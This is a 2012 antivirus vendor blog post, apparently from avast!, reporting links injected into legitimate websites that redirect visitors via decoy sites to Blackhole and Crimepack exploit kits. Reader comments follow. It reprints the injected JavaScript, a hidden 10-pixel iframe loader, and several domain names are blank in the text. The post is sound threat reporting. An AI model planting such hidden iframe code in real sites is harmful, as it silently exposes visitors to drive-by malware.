Protecting over 200 million PCs, Macs, & Mobiles – more than any other antivirus

March 15th, 2012

Surprising hack found on multiple sites

From the “It-could-happen-to-you” file:  We innocently clicked on a link which was promoted today on a trustworthy company’s Facebook page.  To our surprise, avast! blocked it as a malicious URL.

When we attempted to open the URL, it was redirected to which triggered the blocking action. The only content on is one word – GOTCHA!

Senior Virus analyst, Jan Sirmer confirmed the attack when we couldn’t repeat the block. “The site,, was hacked for sure, and redirects to a black hole site,” he said. “Malicious script on the site is checking visitor’s cookies, which is the reason why you don’t see the warning more than once.”

He went on to explain, “We receive only one word: GOTCHA. It’s probably because the attackers running on dumb site’s database with visiting IP addresses, and if they found this IP, only GOTCHA is returned. I think it helps them to be more secure from malware analysts and users looking into how they have been infected.”

After looking into the hack further, Sirmer discovered that the link to, or its variations, was injected to other legitimate sites too. Those links then led to malicious sites containing a black hole exploit kit.

Here is a list of some other dumb sites used as links in hacked legitimate websites:


Sirmer discovered that malicious site is one of the malicious sites where users were redirected from one of  the dumb sites. includes a well-known exploit pack called Crimepack. This exploit pack uses a Java vulnerability and silently downloads malicious Java, PDF and flesh files onto users computers.

In the last four days, Sirmer found that the bad guys injected a link to one of the dumb sites in 138 unique legitimate sites that were visited by avast! users. This is not such a huge number, but the attackers focused on sites like which has lots of visitors.

An example of injected code:

if (document.getElementsByTagName(‘body’)[0]) { iframer(); } else { document.write(“<iframe src=’′ width=’10′ height=’10′ style=’visibility:hidden;position:absolute;left:0;top:0;’></iframe>”); } function iframer() { var f = document.createElement(‘iframe’); f.setAttribute(‘src’, ‘′); = ‘hidden’; = ‘absolute’; = ’0′; = ’0′; f.setAttribute(‘width’, ’10′); f.setAttribute(‘height’, ’10′); document.getElementsByTagName(‘body’)[0].appendChild(f); }

An image of our first visit to


And the second visit. Images provided by avast! Virus Lab.


This image has been marked to show the redirection to

  • Tech

    Sirmer always doing a good hard work…
    I’m jealous, because it’s difficult to get some info from him for the blog :)

  • sourov00

    Avast is the best Virus Scanner in the whole world……

    I love AVAST!!! :D

  • Jan Širmer

    Thanks for compliment Tech.
    I’ll try to improve my information sharing skill for the next time :)

  • iGiedrius

    Hi, thanks for identifying the issue, any ideas how to solve this? I ran a scan on a number of other web security sites and none of them identify the site as suspicious. I deleted the post in question, so not sure if the hack was only on that post or on my server in general as can’t find any problems with any of the online tools.

    Social Media Citizens

  • iGiedrius

    Actually just downloaded your software and checked the copy of on my PC and it didn’t identify any threats as well. Something really weird is happening.

  • Jan Širmer

    I’m trying to figure out how the bad guys injected those websites.
    Can you give me answer to one question please? Do you use a webkit?
    Thanks for answer

  • spg SCOTT

    I have seen this in.cgi?2 page before. It appeared quite a bit in the avast forum under the guise of js:Redirector-NT [Trj].

    The domain that it redirected to was not a constant, but the cgi page was.

    It appears that the script has changed somewhat, but I guess it still has the same effect.

  • iGiedrius

    no I don’t you use a webkit.